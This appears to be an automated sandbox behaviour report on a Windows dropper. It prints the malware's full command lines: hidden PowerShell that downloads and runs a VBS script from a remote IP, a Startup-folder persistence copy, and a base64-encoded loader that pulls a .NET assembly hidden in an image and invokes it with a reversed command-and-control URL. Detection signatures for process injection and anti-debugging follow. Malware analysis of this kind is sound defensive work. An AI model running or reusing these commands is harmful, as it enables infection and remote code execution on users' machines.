CreateProcessInternalW Sept. 9, 2023, 9:41 p.m.	thread_identifier: 2676 thread_handle: 0x00000334 process_identifier: 2672 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden curl http://141.98.6.202/windows/wind/IE_Cache.vbs -o C:\Windows\Temp\Debug.vbs ;Start-Process C:\Windows\Temp\Debug.vbs filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000033c	1	1
CreateProcessInternalW Sept. 9, 2023, 9:41 p.m.	thread_identifier: 2812 thread_handle: 0x00000484 process_identifier: 2808 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden curl http://141.98.6.202/windows/wind/IE_Cache.vbs -o C:\Windows\Temp\Debug.vbs filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000488	1	1
ShellExecuteExW Sept. 9, 2023, 9:41 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Windows\Temp\Debug.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ reUAofclWUÇ.vbs')" filepath: cmd.exe	1	1
CreateProcessInternalW Sept. 9, 2023, 9:41 p.m.	thread_identifier: 2316 thread_handle: 0x0000029c process_identifier: 2324 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA1ADkANwAvADIAMwA2AC8AbwByAGkAZwBpAG4AYQBsAC8AcgB1AG0AcABfAHAAcgBpAHYAYQBkAGEALgBqAHAAZwA/ADEANgA5ADMAOAA0ADcAMAA3ADAAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcARgBpAGIAZQByAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkAOwAkAGEAcgBnAHUAbQBlAG4AdABzACAAPQAgACwAKAAnAHQAeAB0AC4AZABhAHAAZABlAHQAbwBOAC8AcwB3AG8AZABuAGkAdwAvADIAMAAyAC4ANgAuADgAOQAuADEANAAxAC8ALwA6AHAAdAB0AGgAJwApADsAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAGEAcgBnAHUAbQBlAG4AdABzACkA'";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64String( $codigo))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002f8	1	1
ShellExecuteExW Sept. 9, 2023, 9:41 p.m.	show_type: 0 filepath_r: powershell parameters: -command "$Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA1ADkANwAvADIAMwA2AC8AbwByAGkAZwBpAG4AYQBsAC8AcgB1AG0AcABfAHAAcgBpAHYAYQBkAGEALgBqAHAAZwA/ADEANgA5ADMAOAA0ADcAMAA3ADAAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcARgBpAGIAZQByAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkAOwAkAGEAcgBnAHUAbQBlAG4AdABzACAAPQAgACwAKAAnAHQAeAB0AC4AZABhAHAAZABlAHQAbwBOAC8AcwB3AG8AZABuAGkAdwAvADIAMAAyAC4ANgAuADgAOQAuADEANAAxAC8ALwA6AHAAdAB0AGgAJwApADsAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAGEAcgBnAHUAbQBlAG4AdABzACkA'";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64String( $codigo))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"" filepath: powershell	1	1
CreateProcessInternalW Sept. 9, 2023, 9:41 p.m.	thread_identifier: 2548 thread_handle: 0x00000458 process_identifier: 2552 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/597/236/original/rump_privada.jpg?1693847070';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dapdetoN/swodniw/202.6.89.141//:ptth');$method.Invoke($null, $arguments)" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x0000045c	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 9, 2023, 9:41 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (11 events)

Data received	[
Data received	Wdüh QÉ*øJïêÜEcóQä}§}jDOWNGRD æÚo]=«&ð¯ö\|iÇv½ß }ÕøÀ ÿ
Data received	P
Data received
Data received	A`jjKÁu¹úÚË·M8Î V7yK°ÌGl·©ü½Õ$ÏùõßVpwèO½0H~Ý°V{ÿ7÷þj\IE0C mK¸²!ÔÌ¬`übÌc Lxºé¨ÊJ¬xY01ìSRpQ=1`f~¦v^üZ 4K
Data received
Data received
Data received
Data received
Data received	0
Data received	º5±op^¯Ü³[§ôÑ AçM@±^^s1Uùx_í÷úYøéy$E

Poweshell is sending data to a remote host (2 events)

Data sent	yudühj0þû<TAT' ÷,TYwùÎrulï/5 ÀÀÀ À 284ÿuploaddeimagens.com.br
Data sent	FBA{E)u*]\ó¾óZaðH 7ËºGY¯ñ ¶Aßfm"ù(»\¬Ú}9Îû;þ¬BcÔZÜtôê\|Áz0mwýz\Z=1Ü¥ëÿíµ¨x@ÃôT÷Y¥O<S(QûEí7!Ä'5Þ

Checks for the Locally Unique Identifier on the system for a suspicious privilege (5 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 9, 2023, 9:41 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 9, 2023, 9:41 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 9, 2023, 9:41 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 9, 2023, 9:41 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 9, 2023, 9:41 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Windows\Temp\Debug.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ reUAofclWUÇ.vbs')"
cmdline	ping 127.0.0.1 -n 5
cmdline	cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Windows\Temp\Debug.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ reUAofclWUÇ.vbs')"

Communicates with host for which no DNS query was performed (1 event)

host

141.98.6.202

Drops a binary and executes it (1 event)

file	C:\Windows\Temp\Debug.vbs

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send Sept. 9, 2023, 9:41 p.m.	buffer: yudühj0þû<TAT' ÷,TYwùÎrulï/5 ÀÀÀ À 284ÿuploaddeimagens.com.br socket: 1452 sent: 126	1	126
send Sept. 9, 2023, 9:41 p.m.	buffer: FBA{E)u*]\ó¾óZaðH 7ËºGY¯ñ ¶Aßfm"ù(»\¬Ú}9Îû;þ¬BcÔZÜtôê\|Áz0mwýz\Z=1Ü¥ëÿíµ¨x@ÃôT÷Y¥O<S(QûEí7!Ä'5Þ socket: 1452 sent: 134	1	134
WSASend Sept. 9, 2023, 9:41 p.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 2040		0

One or more non-whitelisted processes were created (9 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Windows\Temp\Debug.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ reUAofclWUÇ.vbs')"
parent_process	wscript.exe	martian_process	cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Windows\Temp\Debug.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ reUAofclWUÇ.vbs')"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA1ADkANwAvADIAMwA2AC8AbwByAGkAZwBpAG4AYQBsAC8AcgB1AG0AcABfAHAAcgBpAHYAYQBkAGEALgBqAHAAZwA/ADEANgA5ADMAOAA0ADcAMAA3ADAAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcARgBpAGIAZQByAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkAOwAkAGEAcgBnAHUAbQBlAG4AdABzACAAPQAgACwAKAAnAHQAeAB0AC4AZABhAHAAZABlAHQAbwBOAC8AcwB3AG8AZABuAGkAdwAvADIAMAAyAC4ANgAuADgAOQAuADEANAAxAC8ALwA6AHAAdAB0AGgAJwApADsAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAGEAcgBnAHUAbQBlAG4AdABzACkA'";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64String( $codigo))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
parent_process	wscript.exe	martian_process	powershell -command "$Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA1ADkANwAvADIAMwA2AC8AbwByAGkAZwBpAG4AYQBsAC8AcgB1AG0AcABfAHAAcgBpAHYAYQBkAGEALgBqAHAAZwA/ADEANgA5ADMAOAA0ADcAMAA3ADAAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcARgBpAGIAZQByAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkAOwAkAGEAcgBnAHUAbQBlAG4AdABzACAAPQAgACwAKAAnAHQAeAB0AC4AZABhAHAAZABlAHQAbwBOAC8AcwB3AG8AZABuAGkAdwAvADIAMAAyAC4ANgAuADgAOQAuADEANAAxAC8ALwA6AHAAdAB0AGgAJwApADsAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAGEAcgBnAHUAbQBlAG4AdABzACkA'";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64String( $codigo))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
parent_process	powershell.exe	martian_process	"C:\util\curl\curl.exe" http://141.98.6.202/windows/wind/IE_Cache.vbs -o C:\Windows\Temp\Debug.vbs
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\Debug.vbs"
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden curl http://141.98.6.202/windows/wind/IE_Cache.vbs -o C:\Windows\Temp\Debug.vbs
parent_process	powershell.exe	martian_process	C:\Windows\Temp\Debug.vbs
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/597/236/original/rump_privada.jpg?1693847070';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dapdetoN/swodniw/202.6.89.141//:ptth');$method.Invoke($null, $arguments)"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2560 resumed a thread in remote process 2672
NtResumeThread Sept. 9, 2023, 9:41 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2672	1	0	0

Creates a suspicious Powershell process (11 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
